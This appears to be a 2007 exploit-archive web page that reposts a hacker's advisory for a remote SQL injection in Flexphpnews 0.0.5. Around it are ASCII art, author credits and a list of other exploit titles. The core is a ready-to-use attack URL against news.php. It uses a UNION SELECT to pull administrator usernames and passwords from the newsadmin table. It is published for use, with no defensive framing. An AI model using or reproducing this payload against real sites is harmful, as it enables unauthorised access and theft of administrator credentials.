exploits , vulnerabilities , articles , Flexphpnews 0.0.5 (news.php newsid) Remote SQL Injection Vulnerability

2007-06-08 NewsSync for phpBB 1.5.0rc6 Remote File Inclusion Exploit
2007-04-09 ScarNews 1.2.1 (sn_admin_dir) Local File Inclusion Exploit
2007-04-06 phpMyNewsletter <= 0.8 (beta5) Multiple Vuln Exploit
2007-04-04 phpMyNewsletter 0.6.10 (customize.php l) RFI Vulnerability
2007-03-24 Active Newsletter <= 4.3 (ViewNewspapers.asp) SQL Injection Exploit

2007-04-02

Flexphpnews 0.0.5 (news.php newsid) Remote SQL Injection Vulnerability

Rated as : Moderate Risk

                                                         
.-""""""""-.                       
         
                                                         /   Dj7xpl   \   
                          
                                                        |              |  
                             
                                                        |,  .-.  .-.  ,|  
                             
                                                        | )(_o/  \o_)( |  
                                  
                                                        |/     /\     \|  
                              
                                              (@_       (_     ^^     _)  
               
                                         _     )
\_______\__|IIIIII|__/_______________________________
                                       
(_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In
World___________________________________________+
*
*
*       [~] Portal.......:    Flexphpnews version 0.0.5
*	[~] Download.....:   
http://www.china-on-site.com/flexphpsite/other.php
*	[~] Author.......:    Dj7xpl  | Dj7xpl@yahoo.com
*	[~] Class........:    Remote SQL Injection Vulnerability
*
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
*
*
*       [~] Exploit......:    
http://[Taget]/[Path]/news.php?newsid=999+union+select+0,username,password+from+newsadmin
*
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
*
*
*       [~] Sp Tnx.......:     Milw0rm, Ashiyane, Delta Hacking, Virangar,
Hackerz.ir, Shabgard.org, Simorgh .........
*
+_______________________________________________________________________________________________________________________+
securitydot.net - 2007-04-02

Exploits - newest 10 RSS | More

2007-06-15 38444 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 20065 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 23885 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 20046 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12345 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10503 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12716 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10568 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22722 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 11063 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit